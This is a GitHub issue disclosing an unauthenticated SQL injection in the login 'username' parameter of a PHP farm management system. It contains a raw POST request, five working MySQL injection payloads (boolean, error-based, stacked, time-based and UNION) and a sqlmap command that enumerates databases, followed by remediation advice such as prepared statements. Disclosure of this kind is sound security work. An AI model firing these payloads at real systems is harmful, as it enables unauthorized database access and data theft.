Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Itsourcecode Farm Management System In PHP With Source Code v1.0 index.php SQL injection #2

Open
HryspaHodor opened this issue Jun 18, 2024 · 0 comments

Comments

@HryspaHodor
Copy link
Owner

Itsourcecode Farm Management System In PHP With Source Code v1.0 index.php SQL injection

NAME OF AFFECTED PRODUCT(S)

  • Farm Management System In PHP With Source Code

Vendor Homepage

AFFECTED AND/OR FIXED VERSION(S)

submitter

  • Hryspa_Hodor

Vulnerable File

  • index.php

VERSION(S)

  • V1.0

Software Link

PROBLEM TYPE

Vulnerability Type

  • SQL injection

Root Cause

  • A SQL injection vulnerability was found in the 'index.php' file of the 'Farm Management System In PHP With Source Code' project. The reason for this issue is that attackers inject malicious code from the parameter "username" and use it directly in SQL queries without appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations.
1

Impact

  • Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity.

DESCRIPTION

  • Due to insufficient user input validation for the "username" parameter, a serious SQL injection vulnerability was discovered in the login function of the "Farm Management System In PHP", allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to the database, modify or delete data, and access sensitive information without logging in. Immediate remedial measures are needed to ensure system security and protect data integrity.

No login verification required

Vulnerability details and POC

POST / HTTP/1.1
Host: 192.168.1.136:1219
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 40
Origin: http://192.168.1.136:1219
Connection: close
Referer: http://192.168.1.136:1219/
Upgrade-Insecure-Requests: 1
Priority: u=1

username=admin&password=admin123&submit=

Vulnerability type:

  • time-based blind
  • boolean-based blind
  • error-based
  • UNION query
  • stacked queries

Vulnerability location:

  • 'username' parameter

Payload:

Parameter: username (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: username=-6289' OR 3569=3569#&password=admin123&submit=

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: username=admin' AND GTID_SUBSET(CONCAT(0x7162787071,(SELECT (ELT(2044=2044,1))),0x7176787171),2044)-- PYwH&password=admin123&submit=

    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: username=admin';SELECT SLEEP(5)#&password=admin123&submit=

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=admin' AND (SELECT 8426 FROM (SELECT(SLEEP(5)))ZXyr)-- OZiV&password=admin123&submit=

    Type: UNION query
    Title: MySQL UNION query (NULL) - 3 columns
    Payload: username=admin' UNION ALL SELECT 27,CONCAT(0x7162787071,0x465a507963796e64437a7a42647a756d586a46556a484e42417465726e7a537777454c4c76436772,0x7176787171),27#&password=admin123&submit=

2

The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:

sqlmap -r 123 --batch --dbs

3

Suggested repair

  1. Use prepared statements and parameter binding:
    Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code.

  2. Input validation and filtering:
    Strictly validate and filter user input data to ensure it conforms to the expected format.

  3. Minimize database user permissions:
    Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations.

  4. Regular security audits:
    Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant